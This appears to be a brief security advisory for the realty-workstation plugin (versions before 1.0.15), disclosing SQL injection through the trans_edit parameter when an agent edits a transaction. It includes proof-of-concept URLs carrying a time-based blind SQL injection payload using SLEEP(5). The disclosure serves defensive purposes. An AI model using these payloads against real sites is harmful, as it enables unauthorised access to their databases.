The plugin does not sanitise and escape the trans_edit parameter before using it in a SQL statement when an agent edit a transaction, leading to an SQL injection
As a logged in agent: https://example.com/workstation/?transactions=open_transactions&trans;_edit=1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b) https://example.com/workstation/?transactions= open_agent_transactions&trans;_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
CPE | Name | Operator | Version |
---|---|---|---|
realty-workstation | lt | 1.0.15 |